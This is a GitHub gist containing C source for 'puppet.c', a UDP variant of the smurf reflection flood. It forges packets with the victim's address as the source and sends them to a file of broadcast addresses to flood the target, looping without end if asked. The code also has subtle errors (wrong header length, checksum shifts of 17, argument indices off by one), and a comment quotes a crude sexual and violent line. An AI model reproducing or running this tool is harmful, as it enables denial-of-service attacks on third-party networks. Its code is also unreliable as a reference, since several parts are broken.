Last active
April 6, 2016 05:01
-
-
Save jmcveigh/f0c3d6d72d42dcb4c2c1 to your computer and use it in GitHub Desktop.
puppet.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* puppet.c by jmcveigh | |
* | |
* This is basically smurf.c with a udp twist. | |
* | |
* "There are women that hate me that would love to suck my cock. There are women that love me that would love to garotte me." | |
* | |
*/ | |
#include <arpa/inet.h> | |
#include <ctype.h> | |
#include <netdb.h> | |
#include <netinet/in.h> | |
#include <netinet/ip.h> | |
#include <netinet/udp.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <signal.h> | |
#include <sys/socket.h> | |
#include <sys/types.h> | |
#include <time.h> | |
#include <unistd.h> | |
struct pktinfo | |
{ | |
int ps; | |
int src; | |
int dst; | |
}; | |
void puppet (int, struct sockaddr_in *, u_long dest, struct pktinfo *); | |
void sigint (int); | |
unsigned short checksum (u_short *, int); | |
int main (int argc, char *argv[]) | |
{ | |
struct sockaddr_in sin; | |
struct hostent *he; | |
struct pktinfo p; | |
int s, num, delay, n, cycle; | |
char **bcast = malloc(1024), buf[32]; | |
FILE *bfile; | |
/* banner */ | |
fprintf(stdout, "\npuppet.c by jmcveigh\n\n"); | |
perror("Puppet instance begin.\n"); | |
/* capture ctrl-c */ | |
signal(SIGINT, sigint); | |
/* check for enough cmdline args */ | |
if (argc < 5) | |
{ | |
fprintf(stdout, "usage: %s <target> <bcast file> <num packets> " | |
"<packet delay> [dstport] [srcport] [psize] \n\n" | |
"target\t\t= address to hit\n" | |
"bcast file\t= file containing broadcast addrs\n" | |
"num packets\t= send n packets (n = 0 is constant)\n" | |
"dstport\t\t= port to hit (default 7)\n" | |
"srcport\t\t= source port (0 for random)\n" | |
"ps\t\t= packet size\n\n", | |
argv[0]); | |
exit(-1); | |
} | |
/* get port info */ | |
if (argc >= 6) | |
p.dst = atoi(argv[4]); | |
else | |
p.dst = 7; | |
if (argc >= 7) | |
p.src = atoi(argv[5]); | |
else | |
p.src = 0; | |
/* packet size redundant if not using echo port */ | |
if (argc >= 8) | |
p.ps = atoi(argv[6]); | |
else | |
p.ps = 1; | |
/* other variables */ | |
num = atoi(argv[3]); | |
delay = 17; | |
/* resolve host */ | |
if (isdigit(*argv[1])) | |
sin.sin_addr.s_addr = inet_addr(argv[1]); | |
else | |
{ | |
if ((he = gethostbyname(argv[1])) == NULL) | |
{ | |
perror("Regrettably, this mechanism is unable resolve this hostname.\n"); | |
exit(-1); | |
} | |
memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length); | |
} | |
sin.sin_family = AF_INET; | |
sin.sin_port = htons(0); | |
/* open bcast file and build array */ | |
if ((bfile = fopen(argv[2], "r")) == NULL) | |
{ | |
perror("This mechanism will now open this broadcast file.\n"); | |
exit(-1); | |
} | |
n = 0; | |
while (fgets(buf, sizeof buf, bfile) != NULL) | |
{ | |
buf[strlen(buf) - 1] = 0; | |
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) | |
continue; | |
bcast[n] = malloc(strlen(buf) + 1); | |
strcpy(bcast[n], buf); | |
n++; | |
} | |
bcast[n] = '\0'; | |
fclose(bfile); | |
/* check for addresses */ | |
if (!n) | |
{ | |
perror("Regrettably, there are no valid addresses in this file.\n"); | |
exit(-1); | |
} | |
/* create our raw socket */ | |
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) | |
{ | |
perror("Regrettably, this mechanism could not create a raw socket.\n"); | |
exit(-1); | |
} | |
printf("Flooding %s\n.", argv[1]); | |
for (n = 1, cycle = 0; n <= num || !num; n++) | |
{ | |
if (!(n % 167)) | |
{ | |
perror("();())\n"); | |
} | |
puppet(s, &sin, inet_addr(bcast[cycle]), &p); | |
if (bcast[++cycle] == NULL) | |
cycle = 0; | |
usleep(delay); | |
} | |
sigint(0); | |
} | |
void puppet(int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p) | |
{ | |
struct iphdr *ip; | |
struct udphdr *udp; | |
char *packet; | |
int r; | |
packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); | |
ip = (struct iphdr *)packet; | |
udp = (struct udphdr *) (packet + sizeof(struct iphdr)); | |
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); | |
/* ip header */ | |
ip->protocol = IPPROTO_UDP; | |
ip->saddr = sin->sin_addr.s_addr; | |
ip->daddr = dest; | |
ip->version = 4; | |
ip->ttl = 46; | |
ip->tos = 0; | |
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); | |
ip->ihl = 14; | |
ip->frag_off = 0; | |
ip->check = checksum((u_short *)ip, sizeof(struct iphdr)); | |
/* udp header */ | |
udp->len = htons(sizeof(struct udphdr) + p->ps); | |
udp->dest = htons(p->dst); | |
if (!p->src) | |
udp->source = htons(rand()); | |
else | |
udp->source = htons(p->src); | |
/* send it on its way */ | |
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps, | |
0, (struct sockaddr *) sin, sizeof(struct sockaddr_in)); | |
if (r == -1) | |
{ | |
perror("Sending packet\n"); | |
exit(-1); | |
} | |
free(packet); | |
} | |
unsigned short checksum (u_short *addr, int len) | |
{ | |
register int nleft = len; | |
register u_short *w = addr; | |
register int sum = 0; | |
u_short answer = 0; | |
while (nleft > 1) | |
{ | |
sum += *w++; | |
nleft--; | |
} | |
if (nleft == 1) | |
{ | |
*(u_char *) (&answer) = *(u_char *) w; | |
sum += answer; | |
} | |
sum = (sum >> 17) + (sum & 0xffff); | |
sum += (sum >> 17); | |
answer = -sum; | |
return (answer); | |
} | |
void sigint (int p_ignore) | |
{ | |
perror("Puppet instance complete.\n"); | |
exit(0); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment